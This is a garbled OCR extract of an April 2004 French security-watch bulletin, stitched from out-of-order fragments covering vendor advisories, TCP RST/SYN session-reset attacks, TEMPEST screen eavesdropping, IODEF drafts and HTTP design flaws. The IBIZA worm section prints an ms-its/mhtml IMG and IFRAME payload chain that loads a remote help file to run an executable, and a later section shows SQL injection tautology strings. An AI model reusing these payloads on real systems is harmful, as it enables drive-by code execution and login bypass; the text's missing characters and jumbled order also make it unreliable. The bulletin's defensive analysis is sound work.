105. m 3 1 2 3 3 3 3 5 Veille Technologique S curit N 69 Page 30 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi 5 Representation Examples 5 1 Multiple Contacts 5 2 Expectation 5 3 Sequence of Events 5 4 XML Signature 5 5 XML Encryption 5 6 Non English example 5 7 Translations 6 Acknowledgments 7 Appendix 1 Normative References Informative References Author s Address Intellectual Property and Copyright Statements On notera avec amusement que le document de r f rence Incident Object Description and Exchange Format Data Model and XML DTD n est plus disponible sur les serveurs de l IETF Il a en effet t d truit fin mars conform ment la politique de l IETF fixant 6 mois la dur e de vie d une proposition de standard ftp ftp nordu net internet drafts draft ietf inch iodef 02 txt Syntaxe IODEF ftp ftp nordu net internet drafts draft ietf inch implement 00 txt Recommandations d impl mentation Veille Technologique S curit N 69 Page 31 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 ALERTES GUI DE DE LECTURE La lecture des avis publi s par les diff rents organismes de surveillance ou par les constructeurs n est pas toujours ais e En effet les info
106. m pipermail full disclosure 2004 March 019433 html A LA I Forte 22 04 SiteMinder a042204 1 http www atstake com research advisories 2004 a042204 1 txt CAN 2004 0425 NULLSOFT Forte 05 04 WulsofrWiampversions 2 918802 C C o SS NISROS042004 DITY 3RI I Li D ni de service dans l annuaire LDAP OpenLDAP Une erreur de conception dans l annuaire OpenLDAP peut entra ner un d ni de service Forte 01 04 OpenLDAP versions inf rieures 2 1 29 avec la fonctionnalit back Idbm activ e Correctif existant Fonctionnalit back Idbm Erreur de conception Fonction slap passwd parse Security Tracker http www securitytracker com alerts 2004 Apr 1009627 html Veille Technologique S curit N 69 Page 43 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Forte 30 03 Oracle SSO toutes versions et platesformes O ANDA SOFTWARE m F ADE YT 74 VAR I 1 4 ZA 1 VJ 4 8 VET Em R D bordements de buffer distant sur ActiveScan Panda ActiveScan est vuln rable plusieurs d bordements de buffer exploitables distance Moyenne 07 04 Panda Software ActiveScan 5 0 Palliatif propos Biblioth que ascontrol dll D bordement de buffer distant Rafel I vgi 53 http theinsider deep ice com texts advisor
107. md Erreur de conception BEA04 58 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEAO4 58 00 jsp Mauvaise validation des chaines de certificats BEA WebLogic ne valide pas correctement les cha nes de certificats et permet d usurper l identit d un tiers Forte 13 04 BEA WebLogic Server et Express 8 1 SP2 et inf rieurs 7 0 SP4 et inf rieurs Correctif existant Custom Trust Manager Mauvaise validation des cha nes de certificats BEAOA 54 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEAO4 54 00 jsp Mauvaise gestion des privil ges dans WebLogic L utilisation du syst me d authentification WebLogic dans un domaine de s curit ouvre une faille de s curit Moyenne 13 04 WebLogic Server et Express version 8 1 SP2 et inf rieure version 7 0 SP4 et inf rieure Correctif existant Authentication provider Mauvaise gestion des privil ges BEA04 52 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEA04 52 00 jsp Non _ 20 04 Check Point SecurePlatform NG et sup rieurs 000 Une vuln rabilit dans l impl mentation du client VPN IPSec CISCO permet de r cup rer le mot de Critique 15 04 CISCO IPSec VPN Client pour Linux et Windows logice lt __ Veille Technologique S curit N 69 Page 34 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Vuln rabilit
108. ment aux limites Les validations pr c dentes ne tiennent g n ralement pas compte d un facteur non contr l mais contr lable l injection d l ments protocolaires non conformes contenant ventuellement des donn es positionn es en dehors du domaine de validit sp cifi ou syntaxiquement incorrectes Les tests aux limites visent mettre en vidence les erreurs dans l impl mentation des contr les devant normalement tre op r s sur toutes les structures de donn es avant traitement Veille Technologique S curit N 69 Page 6 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Une sp cification rigoureuse se doit de d finir explicitement un jeu de tests permettant de valider l impl mentation de chacune des fonctions ce jeu de tests tant normalement tabli pour couvrir tous les cas de figure donnant lieu un traitement sp cifique et en particulier les traitements d exception provoqu s par un param tre en dehors domaine de validit Mais encore faut il avoir d fini le domaine de validit de chaque param tre avoir fig les sp cifications et disposer d un environnement de d veloppement facilitant l int gration des tests unitaires dans les unit s de programmation Les environnements et langages les plus utilis s de nos jours n offrent h las aucune de ces facilit s l exception peut tre du langage perl et enc
109. n d ni de service mais en cr ant aussi les conditions id ales pour conduire une attaque plus pouss e de type Man In The Middle est pour cela n cessaire de pouvoir jongler avec les conditions pr c demment expos es 1 Avoir connaissance des couples adresse et num ro de port TCP de la session que l on souhaite casser La facilit avec laquelle cette condition peut tre remplie d pend du contexte et principalement du protocole cible L avis d alerte mis par l UNIRAS mentionne le protocole BGP4 pour lequel les ports source et destination sont connus les adresses IP des tiers en ligne pouvant tre ais ment d couvertes puisqu il s agit d quipements de routage 2 Avoir connaissance du num ro de s quence du dernier paquet TCP transmis Si les premi res impl mentations du protocole TCP utilisaient une valeur initiale dite ISN ou Initial Sequence Number ais ment pr dictible les nombreuses attaques d velopp es depuis ont conduit les concepteurs utiliser une valeur initiale purement al atoire donc cens e mettre en d faut les techniques de pr diction ou au minimum de diminuer la fiabilit des algorithmes de pr diction Dans le cas pr cis des conditions r gissant le traitement des paquets RST et SYN la contrainte de pr diction se r duit trouver le num ro de s quence de l un des quelconques paquets ayant t transmis dans la fen tre d acquittement active Rappelons que pour des prob
110. n s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 MYSQL 39 NAI MCAFEE 39 NOVELL 39 REAL NETWORKS 40 SGI 40 SUN 40 TCP 40 ALERTES NON CONFIRM ES 41 ACTI VESTATE 41 ADOBE 41 APACHE 41 BITDEFENDER 41 CLAMAV 41 GNOME 41 GNU 41 IBM 41 IP 42 ISS 42 KAME 42 KERIO 42 LI NUX 42 MACROMEDI A 43 MI CROSOFT 43 McAFEE 43 NESSUS 43 NETEGRI TY 43 NULLSOFT 43 OPENLDAP 43 ORACLE 44 PANDA SOFTWARE 44 PHP 44 QUALCOMM 44 REAL NETWORKS 44 SAMSUNG 44 SYMANTEC 44 TCPDUMP 45 TILDESLASH 45 YAHOO 45 AUTRES INFORMATIONS 46 REPRISES D AVIS ET CORRECTIFS 46 APPLE 46 AVAYA 46 BLUE COAT 46 CERT 46 CI AC 46 CI SCO 48 CVS 48 FREEBSD 48 F SECURE 49 HP 49 IBM 50 JUNI PER 50 LI NUX CALDERA 50 LI NUX DEBI AN 50 LI NUX FEDORA 50 LINUX MANDRAKE 51 LI NUX REDHAT 51 MI CROSOFT 51 NOVELL 52 PERL 52 SCO 52 SI DEWI NDER 52 SUN 52 SGI 53 SYMANTEC 53 VMWARE 53 CODES D EXPLOITATION 53 CISCO 53 ETHEREAL 53 ISS 54 MI CROSOFT 54 TCP 54 TCPDUMP 54 WINZIP 54 BULLETINS ET NOTES 54 SYMANTEC 54 ATTAQUES 55 OUTILS 55 Veille Technologique S curit N 69 Page 3 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 PATCHFINDER V2 11 55 TECHNIQUES 56 DIGRESSIONS AUTOUR DU PROTOCOLE HTTP 56 SQL TECHNIQUES D INJECTION ET ANALYSE DE SIGNATURE 62 Veille Technologique S curit N 69 Page 4 64 APOGEE Communications
111. n d j publi s le plus ancien remonte l ann e 2000 au sein d un unique script Le risque est d autant plus r duit que les correctifs associ s ont t publi s de longue date Cependant certains quipements peuvent encore tre vuln rables n ayant pu tre mis jour pour des raisons de oroduction http www securiteam com exploits 5bOPOLIFCAE html http www cisco com warp public 707 cisco sn 20040326 exploits shtml ETHEREAL Codes d exploitation pour Ethereal Deux codes exploitant une vuln rabilit dans les dissecteurs EIGRP et IGAP sur Ethereal et permettant de orovoquer un d ni de service ont t publi s http www securiteam com exploits 5EPOYOOCAE html http www securiteam com exploits 5UP1400CAY html CAN 2004 0176 Veille Technologique S curit N 69 Page 53 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Un code d exploitation pour la vuln rabilit dans le composant ISS Protocol Analysis Module PAM permettant d ex cuter un code arbitraire a t publi Codes d exploitation pour deux vuln rabilit s MS04 011 Trois codes d exploitation pour les vuln rabilit s d crites dans le bulletin Microsoft MS04 011 ont t publi s Le premier provoque un d ni de service lors du traitement de messages SSL sp cialement construits Ce code a t test sur Windows 2000 av
112. n plurielle citoyen tat industrie priv e Les industriels appuient l organisme actuel Le d bat n est pas clos puisque l tude de la gouvernance de l Internet telle que d finie pr c demment v ritable pierre d achoppement politique du sommet de Gen ve a t repouss e 2005 pour le sommet de Tunis est d autres aspects qui tout en ne relevant pas directement d une probl matique de gestion d une ressource communautaire par une entit obligatoirement centralis e devront pourtant imp rativement tre abord s au titre des r flexions communes men es sur la gouvernance de l Internet Pour illustrer notre propos nous pr senterons des chantiers num riques sur lesquels industriels institutionnels et soci t civile devront coop rer pour proposer un cadre de d veloppement durable et viable pour l Internet de demain Un espace de confiance La confiance est l un des services fondamentaux que doit rendre le r seau aux utilisateurs Elle concerne des probl matiques aussi importantes que Assurer la s curit des changes des traitements et du stockage de donn es confidentielles voire simplement personnelles Probl matique essentiellement mais pas uniquement technique elle implique la fois les industriels innovation technique normes et standards et les institutions autorisations concernant la longueur des cl s de chiffrement Contr ler les contenus WEB illicites Lutter contre le SPAM Le c
113. nement du protocole Sp cifi es dans le RFC793 ces conditions sont transcrites dans l automate d tat du protocole Elles stipulent notamment que les paquets contenant un drapeau RST ou SYN ne seront valides qu la condition d tre coh rents avec l tat courant du protocole d termin par plusieurs l ments protocolaires Identit des tiers intervenant dans la session d termin e par les couples adresse et num ro de port Num ro de s quence du prochain paquet TCP cod sur 32 bits et utilis pour acquitter le paquet courant Le RFC793 pr cise a ce propos que In all states except SYN SENT all reset RST segments are validated by checking their SEQ fields sequence numbers A reset is valid if its sequence number is in the window In the SYN SENT state a RST received in response to an initial SYN the RST is acceptable if the ACK field acknowledges the SYN Et par ailleurs que un paquet RST destin rompre la session sera transmis au cas o un paquet SYN serait recu avec un num ro de s quence valide dans la fen tre d acquittement On imagine ais ment les effets de bord g n r s par ces conditions et les cons quences de l utilisation d tourn e de ces deux types de paquets quiconque ayant connaissance de l identit des tiers en communication et du num ro de s quence attendu pourrait casser loisir les sessions que ces tiers auraient tabli en g n rant non seulement u
114. nomie ainsi r alis e en r utilisant des briques existantes mais concues pour r pondre des besoins qui ne sont plus d actualit Ne serait il pas temps d envisager devoir faire table rase des mod les existants et de leurs limitations en s appuyant sur l exp rience acquise pour reconstruire des syst mes plus adapt s aux besoins actuels comme l avait fait en son Veille Technologique S curit N 69 APOGEE Communications Tous droits r serv s Page 56 64 Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 temps Descartes avec les math matiques La comparaison peut sembler os e mais elle est pourtant correcte La seule diff rence r side dans le facteur moteur de l volution actuel le facteur financier et l absence de m c nes susceptibles de financer fonds perdus une telle d marche Mais en y r fl chissant bien n a t on pas assist aux pr misses d une telle r volution avec l mergence du syst me LINUX mais aussi sa fin brutale lors de la r cup ration de cette d marche par le circuit commercial Nous prendrons le protocole HTTP comme un exemple clatant de cette d marche certes conomiquement viable mais techniquement risqu e qui consiste donc employer un m canisme prouv bien au del de son domaine de fonctionnement avec les cons quences que l on imagine Ce protocole a t concu vers la fin des ann es 80 pour r pondre un besoin
115. nouvelle classe de probl mes dont il y a tout lieu de craindre que la solution viable terme passe par une red finition des conditions d utilisation des URI complexes Le ver I BI ZA Ce probl me de conception est actuellement activement exploit par le ver IBIZA De nombreux proc d s Veille Technologique S curit N 69 Page 60 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 d exploitation alternatifs ont par ailleurs t publi s depuis le mois de f vrier qui permettent la mise en uvre d une attaque autorisant le transfert puis l ex cution d un quelconque code ex cutable dans la zone locale du navigateur et cela sans que l utilisateur n ait engager d autre action que la simple visualisation d une page astucieusement pi g e Le proc d utilis est d autant plus redoutable qu il n cessite une connaissance approfondie des m canismes pr c demment pr sent s pour en comprendre le fonctionnement r el Le ver IBIZA fait ainsi appel aux l ments suivants Un code ex cutable d nomm mstasks exe contenant les actions engager sur le syst me attaqu Un fichier HTML d nomm launch html r f rencant le fichier pr c dent dans une balise NAME X CLA D VOTO SEDIS UTE dL MAR a EOS Cette syntaxe HMTL tout fait l gale indique au navigateur
116. nt conduire une mise en uvre tr s rapide Nous ne pouvons que recommander la lecture de ce guide dont nous reproduisons ci dessous la table des mati res SECTI ON 1 INTRODUCTI ON 1 Introduction 1 1 Objectif du document 1 2 Champ d application 1 3 Mode d emploi du guide m thodologique 1 4 Pourquoi laborer des tableaux de bord SSI 1 5 Pr sentation des concepts 1 6 D marche de s curisation et tableaux de bord SSI 1 7 Pr requis 2 Pr sentation g n rale de la m thode 2 1 synth se de la m thode 2 2 structure des fiches m thodologiques 3 Introduction Etape 1 Pr requis Etape 2 Mise en place du projet de tableaux de bord SSI Etape 3 Elaboration des tableaux de bord SSI Etape 4 Exploitation des tableaux de bord SSI Etape 5 Evolution des tableaux de bord SSI SECTI ON 2 EXEMPLE D APPLI CATI ON 1 Introduction Etape 1 Pr requis Etape 2 Mise en place du projet de tableaux de bord SSI Etape 3 Elaboration des tableaux de bord SSI Etape 4 Exploitation des tableaux de bord SSI Etape 5 Evolution des tableaux de bord SSI SECTION 3 PROFORMAE Destinataires des tableaux de bord SSI Documents relatifs aux objectifs de s curit Documents relatifs aux objectifs de progression de SSI Syst me d information Planning initial Formalisation des objectifs mesurables S lection des l ments de mesure Elaboration des indicateurs Constitution des tableaux de bord SSI 10 Fiche descriptive d indicateur
117. nts de s curit L introduction du standard XML permettant de structurer les changes de donn es sur HTTP est probablement l origine d un tournant fondamental dans l volution de l usage de ce protocole qui devient alors officiellement un protocole de session permettant de transporter n importe quel type d information en faisant abstraction des sp cificit s des tiers intervenant dans l change I devient alors possible d envisager utiliser le protocole HTTP comme un v ritable protocole d invocation d objets distance mode de fonctionnement d sormais officialis par le biais de la sp cification SOAP qui ont accompagn le d veloppement du E Lo T protocole TCP d un c t avec le m canisme d appel distant RPC et sa syntaxe XDR mais aussi des protocoles OSI avec leur Invocation Structuration syntaxe de transfert ASNI Le cheminement suivi par l volution de ces technologies de communication a de quoi rendre perplexe un observateur ext rieur qui ne prendrait pas en compte l impact des Transport PDU exigences du march lequel attend rarement st t la maturit d une technologie pour passer la suivante Force est de reconnaitre la sup riorit de la technologie SOAP non pas sur le plan des performances ou de la puret technique mais plus prosaiquement sur la facilit et la simplicit des d veloppements associ s du moins en pr
118. ons A 4 Transmission lines and antennas A 5 Time domain characterization of antennas Nos lecteurs d sireux d exp rimenter par eux m me dans ce domaine pourront construire leur EckBox un syst me d analyse constitu d un logiciel libre r cemment diffus et d un capteur d acquisition prenant la forme d un r cepteur radio dont la sortie audio sera connect e sur une carte de conversion analogique digital performante Compl ment d information http www cl cam ac uk TechReports UCAM CL TR 577 pdf Dernier rapport http www cl cam ac uk mgk25 ih98 tempest pdf Premier rapport publi en 1998 http eckbox sourceforge net Un logiciel d analyse EckBox http dafh org gbppr mil eckbox Mat riel et recommandation d utilisation du logiciel pr c dent Veille Technologique S curit N 69 Page 12 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 INFORMATIONS ET LEGI SLATION LES NFORMATI ONS METHODES DCSSI METHODE PSSI Description En 1994 le Service Central de la S curit des Syst mes d Information SCSSI publiait la seconde version d un remarquable guide intitul PSI Politique de S curit Interne Celui ci s appuyait d une part sur les principes fondateurs dict s par l OCDE et d autre part sur les crit res d valuation de la s curit dits I TSEC pour tablir une liste des
119. ore s agit il ici plus d un style d criture que d une fonction int gr e au langage Quant au langage ADA les projets l utilisant se font de plus en plus rares Les cons quences de ce laxisme sont tangibles et quotidiennes il suffit d tudier en d tail les causes des vuln rabilit s quotidiennement d couvertes pour s en convaincre d bordements de buffer provoqu s par une allocation de m moire insuffisante d bordements d entier provoqu s par la confusion entre le type des variables sign es ou non sign es Il y a quinze ans de cela ce type d erreur provoquait tout au plus de la part des utilisateurs la r flexion encore un bug D sormais chaque erreur de ce type g n re une alerte de s curit Face l appauvrissement de la qualit des sp cifications quand celles ci existent et la logique de d veloppement rapide bien ancr e dans les moeurs la mise en place syst matique de tests aux limites visant mettre en vidence les dysfonctionnements notoires semblent tre la moins mauvaise solution Cette solution n a t elle d ailleurs pas t pr conis e derni rement par le NIST dans son guide Recommended Common Criteria Assurance Levels comme conditionnant le premier niveau d valuation de leur grille dont nous rappelons ci dessous la constitution ALI Vulnerability testing AL2 Functional testing AL3 Rigorous COTS development ALA Significant security engineering AL5 Verified significant security eng
120. otKit l environnement Linux Ecrit en langage C et livr avec toutes les sources amp Process Explorer Sysinternals www sysinternals com E B x File Options wiew Process Find Handle Help Bl E FE d de PatchFinder prend la forme d une interface Prces cPu Deseipin A utilisateur pfAgentConsole fonctionnant en E CHD EXE Windows NT Command Processor mode texte dans une console de commande pi gentConsole pilotant un service Windows pfService initialis QF procesp exe 2 e dienak Expire T pii ervice ee au d marrage du syst me Un gestionnaire sp cifique assure l interfa age de ce service avec le noyau du syst me d exploitation sm Desktop Default Une analyse peut ainsi tre engag e sur la machine pisc Windows locale ou sur un syst me distant sans avoir pour Directo XKnownDlls autant d affecter des privileges etendus CPU Usage 100 Commit Charge 29 23 Processes 24 l exploitant L installation du service et du gestionnaire est facilit e par la pr sence d un outil d installation fonctionnant lui aussi en mode ligne de commande C Program Files pf bin gt pfinstall install c program files pf bin Installation des programmes installing pfDriver done installing pfService done C Program Files pf bin gt pfagentconsole Connexion au service using pipe pipe pf_cmd Refus car le service est en Thore vas an
121. otocals computers agree on how to exchange and par le navigateur du poste ayant invoqu laide o Policy Agent protect nformat dn ae shonn Nihe en ligne 5 policy properties following figure L i ti hh i HTML Help t IPSec security negotiation application exe eip perme E 5 packet handling le poste local et ainsi de visualiser le contenu Enlarge figure et le format des pages associ es L analyse du source HTML d un page r v le quelques unes des caract ristiques fondamentales du protocole ms its comme le d taille l extrait significatif propos ci apr s lt HEAD gt de naviguer dans un fichier CHM pr sent sur E what is IPSec tunneling SCRIPT LANGUAGE JScript SRC MS ITS ntshared chm shared js gt lt SCRIPT gt lt TITLE gt IPSec security negotiation lt TITLE gt lt LINK REL stylesheet MEDIA screen TYPE text css HREF MS ITS ntshared chm coUA css gt LINK REL stylesheet MEDIA print TYPE text css HREF MS ITS ntshared chm coUAprint css gt lt HEAD gt lt BODY gt lt 1 gt lt NAME a sag IPSecisakmp IPSec security negotiation A H1 img src ms its NTArt chm s03ag ipsecconcepts gif gt Le gestionnaire du sch ma ms its n est exploitable qu la condition pr alable qu il ait t pr alablement activ soit par un appel la fonction ShowHelp soit plus simplement par le biais du script shared js dont on d co
122. ourrier lectronique repr sente l application phare de l Internet car acc d e par le plus grand nombre Un espace citoyen Parmi les facteurs importants n cessaires au d veloppement d un espace citoyen certains avancent l id e de l utilisation d une identit universelle Cette revendication notamment port e par Jon Thor Thorhallsson pr sident du CECUA Confederation of European Computer User Associations consid re comme un droit fondamental de l internaute citoyen le fait de pouvoir communiquer en utilisant le nom de son tat civil tout comme il est d usage dans la soci t r elle Un espace multilingue Veille Technologique S curit N 69 Page 20 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Apogi Bien que l Internet soit actuellement domin par la langue anglo saxonne de par la quantit de contenus WEB produits et diffus s ce constat ne refl te que le dynamisme certain de l conomie am ricaine que l on observe par ailleurs dans d autres domaines tels que la production cin matographique Le vrai probl me du multilinguisme sur l Internet r side essentiellement dans la difficult qu ont les internautes de r f rencer DNS et d indexer moteur de recherche leur contenu WEB dans une langue non romane Par exemple un utilisateur de langue arabe ne peut poss der un nom de domaine en arabe Des normes telle
123. principes devant tre trait s dans le cadre de toute politique de s curit Au del du cadre f d rateur ainsi propos et de sa Rappel r gle de base A r gle caract re majeur pour les organismes sensibles parfaite ad quation au contexte Fran ais ce guide A PSI 001 Une r gle pr voit la responsabilit g n rale pour la s curit du de 144 pages avait le m rite d utiliser une approche systeme d information de l organisme tr s p dagogique en d clinant chaque principe sous La nomination d un responsable de la s curit permet de veiller au la forme d une affirmation comment e selon une respect d une politique de s curit interne tous les chelons et pr sentation fortement structur e domaines de l organisme Depuis 1994 les crit res d valuations ont notablement volu donnant lieu aux crit res communs dits CCSEC les principes directeurs de l OCDE ont t revus en 2002 et diff rents projets de normes r gissant la gestion et l organisation de la s curit ont abouti Sans tre obsol te le guide PSI n cessitait d tre revu pour int grer ces volutions et s adapter au contexte de la mondialisation des communications le r seau Internet tant quasiment x inexistant en 1994 Fin mars la DCSSI a donc d voil le guide PSSI longtemps attendu devant succ der PSI Ce nouveau guide conserve cet ancrage fondamental de notre point de vue dans les neufs principes nonc
124. protocole I PSEC R duire la taille de la fen tre d acquittement au risque de r duire aussi la qualit de service Eviter de diffuser les num ros des ports sources utilis s Ces recommandation sont purement palliatives car elles ne traitent pas le probl me de fond intimement li la conception du protocole TCP La proposition de standard intitul e Transmission Control Protocol security considerations vient rem dier cette nouvelle classe de probl mes en proposant plusieurs am nagements dans la logique de gestion des paquets Veille Technologique S curit N 69 Page 29 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 utilisant les drapeaux RST SYN et L id e propos e est de transformer la condition ouverte d acceptation d un paquet marqu d un drapeau SYN ou ACK et contenant un num ro de s quence dans une plage acceptable en une condition stricte n autorisant que le paquet contenant le dernier num ro de s quence attendu Les paquets contenant un num ro de s quence appartenant la fen tre d acquittement provoqueront simplement l envoi d un paquet ACK sans conduire la rupture de la session La r ception d un paquet l gitime mais mal positionn dans la fen tre ne conduira ainsi qu diff rer d un change la rupture de la session Cette solution l gante a le double m ri
125. qu il va devoir ex cuter l objet X enregistr avec le CLASSI D mentionn et dont le code associ sera charg depuis l emplacement mentionn dans CODEBASE sous r serve que le programme et la page WEB soient situ s dans le m me r pertoire Ce ne sera normalement jamais le cas sauf trouver un proc d permettant de transf rer le code et cette page sur le syst me local puis charger celle ci en contournant le m canisme de protection li au concept de zone Un fichier d aide d nomm chm chm localis sur un site tiers contenant les deux fichiers pr c dents L ouverture du fichier chm chm conduira imm diatement l ouverture de la page r f renc e ici launch html et donc l ex cution du fichier mstask exe contenu dans celui ci Dans l hypoth se o le fichier chm chm est localis sur un site distant le fichier sera sauvegard dans le cache du navigateur puis ouvert dans la zone Internet L utilisateur sera donc notifi du risque encouru ex cuter un programme tiers Une page pi g e contenant une s quence complexe r f rencant le protocole ms its IMG SRC 2 ms its mhtml file C Nss MHT http www x com chm chm files launch htm IMG SRC 2 ms its mhtml file C Nss MHT http www x com chm chm files launch htm IMG SRC 2 ms its mhtml file C Nss MHT http www x com chm chm files launch htm lt IFRAME SRC 2 redirgen php url URL ms its mhtml file C Nss MHT http www
126. rcheur hollandais d sormais c l bre Tout laisse cependant croire que ce proc d d acquisition distance ne n cessitant aucune connexion directe avec le syst me espionn ait t utilis par plusieurs pays d s les ann es 70 mais sans jamais avoir t r v l car classifi au plus haut niveau On aurait pu penser que ce probl me dispara trait naturellement avec l volution des modes d affichage et plus pr cis ment avec l utilisation croissante des environnements graphiques 11 n en est rien comme le d montre les diff rents tests men s depuis 2001 par Markus Kuhn et l quipe de recherche TAMPER Ces tests ont d montr qu il tait non seulement possible de reconstituer distance le contenu d un cran graphique pr sent sur un moniteur cathodique classique mais aussi sur le moniteur LCD d un PC portable et c est l que r side la grande nouveaut Le transfert d information vers le moniteur LCD d un PC ce dines ee Lodi nds portable est en effet g n ralement r alis au moyen d un bus s rie num rique et non par une liaison analogique comme cela est le cas avec un cran classique L information acquise n est donc plus directement repr sentative de la luminosit d un pixel mais de l encodage binaire associ la repr sentation de celui 11 est donc n cessaire de transcoder l information d amplitude re ue pour obtenir une repr sentation exploitable La seconde difficult r side dans l acquisition
127. rds indispensables au suivi des actions de s curit Ce guide cons quent est organis en trois sections couvrant la pr sentation de la m thodologie 58 pages un exemple concret d application 42 pages et enfin un recueil de 13 mod les 16 pages de documents utilisables durant le processus de d finition des tableaux de bord Ce processus est lui m me organis en 5 tapes constitu es de une huit t ches dont les objectifs sont r capitul s dans le tableau suivant Etape T che Objet 1 PRE REQUIS N dentification des destinataires des tableaux de bord SSI Utilisation pr vue des tableaux de bord SSI Expression de la p riodicit souhait e des tableaux de bord SSI Disponibilit des objectifs de s curit Disponibilit des objectifs de progression de SSI 6 Connaissance du syst me d information cibl Connaissance des possibilit s d obtention de donn es sources NA Prise en compte de la dimension budget et moyens 2 MISE EN PLACE DU PROJET DE TABLEAUX DE BORD SSI Identification et mobilisation des acteurs Veille Technologique S curit N 69 Page 15 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 3 LABORATION DES TABLEAUX DE BORD 551 L 1 Formalisation des objectifs mesurables S lection des l ments de mesure M LE CS __4_ Constitution des tableaux de bord SS
128. re est quasi nulle et ce dans toutes langues connues l exception d un langage de programmation dont le langage SQL La richesse de ce dernier permet d envisager pouvoir utiliser une multitude de variations syntaxiques d une m me forme s mantique en notant toutefois comme le font remarquer les auteurs de l tude que ce langage admet aussi quelques s mantiques absolument uniques voire invariantes en particulier l expression tr s usit e UNI ON SELECT ou encore EXEC SP en environnement MS SQL SELECT User FROM Users WHERE vl AND Code v2 Param tres normalement invalides SELECT User FROM Users WHERE OR AND Code z OR Veille Technologique S curit N 69 Page 63 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Tout l art de l expert en injection SQL r sidera donc dans sa maitrise du langage et plus pr cis ment dans la connaissance de toutes les variations d une m me expression Les auteurs de l tude SQL injection signature evasion nous pr sentent ainsi la d marche d un hypoth tique expert en ce domaine confront un nouveau syst me de protection dont il devra d terminer en aveugle s il s agit d un syst me signature et si tel est le cas d terminer la liste des signatures connues de celui ci pour tenter de passer travers les mailles d
129. ription and IODEF description should be capable of being read by humans The use of automatic RSS parsing tools is foreseen but should not be critically necessary Les r gles d impl mentation de ce mod le ont t regroup es dans un guide publi sous la forme d une proposition de standard intitul e 1 ODEF Implementation Guide On y trouvera l ensemble des recommandations et r gles d impl mentation dont le respect permettra de garantir la coh rence des donn es chang es entre les structures d alerte g n ration des identifiants uniques associ s chaque incident formalisme associ aux champs en saisie libre processus de validation d un incident avant transmission La liste des l ments et attributs sp cifi s et utilis s dans le mod le I ODEF est fournie en annexe 1 Introduction 1 1 Terminology 1 2 Overview 1 3 CSIRT Operations 2 General Integration Considerations 2 1 Unique Identifiers 2 2 Profiles 1 Required Data 2 Semantics 3 Formatting 4 Transport issues 2 3 Updating Incident Data I mporting and Processing Considerations 3 1 Processing Algorithm 3 3 draft ietf inch iodef 00 draft ietf inch iodef 02 22 22 22 22 relationship Types of Data 3 1 Enumerated Values 3 2 Structured Values 3 3 Subjective Values 3 4 Free form Values 3 5 Extensions 3 4 Structure of the Data 3 4 1 Non deterministic 3 4 2 Document unique idents 4 Export Considerations 4 1 Processing Algorith
130. rmations publi es peuvent tre non seulement redondantes mais aussi transmises avec un retard cons quent par certains organismes D s lors deux alternatives de mise en forme de ces informations peuvent tre envisag es Publier une synth se des avis transmis durant la p riode de veille en classant ceux ci en fonction de l origine de l avis Publier une synth se des avis transmis en classant ceux ci en fonction des cibles La seconde alternative pour s duisante quelle soit ne peut tre raisonnablement mise en oeuvre tant donn l actuelle diversit des syst mes impact s En cons quence nous nous proposons de maintenir une synth se des avis class e par organisme metteur de l avis Afin de faciliter la lecture de ceux ci nous proposons un guide de lecture sous la forme d un synoptique r sumant les caract ristiques de chacune des sources d information ainsi que les relations existant entre ces sources Seules les organismes constructeurs ou diteurs disposant d un service de notification officiel et publiquement accessible sont repr sent s Avis S p cifiques _ Constructeurs Editeurs Ind pendants Syst mes Syst mes Editeurs Editeurs J Autres J Autres Compaq Linux Aus CERT NetBSD Typologies des informations publi es Publication de techniques et de programmes d attaques SGI OpenBSD D tails des alertes techniques et programmes SUN SCO Synth ses
131. rnationale ou un standard publiquement reconnu 4 Capacit ex cuter le code associ au fichier dans un environnement de s curit restreint ou sandbox Les deux premiers facteurs participent l augmentation du risque les deux derniers conduisent le r duire Deux facteurs additionnels sont pris en compte l L existence de vuln rabilit s connues dans les applications supportant ce format 2 Complexit du format conduisant un risque certain s il est incorrectement g r par l application Nous proposons ci apr s une liste des extensions identifi es par la note de l UNIRAS et class es par niveau de risques en recommandant au lecteur int ress de se reporter la note originale bien plus d taill e Celle ci mentionne notamment les r f rences CVE des vuln rabilit s connues pour ces formats Risque Extension Format Faible Risque Extension Format wmf graphique exe ex cutable ibrairie OCX SCT screen saver SyS Ldl 0 0 0 Ox sys driver O Lob objet J lib librairie hta sct ws c f h pr sentation cgi vbs scripts mdf dbf csh ksh sh La classification effectu e par l UNI RAS appelle les remarques suivantes e Sans avoir la pr tention d tre exhaustive les extensions list es correspondent aux formats les plus usit s en particulier en environnement Windows e Si les extensions class es dans le
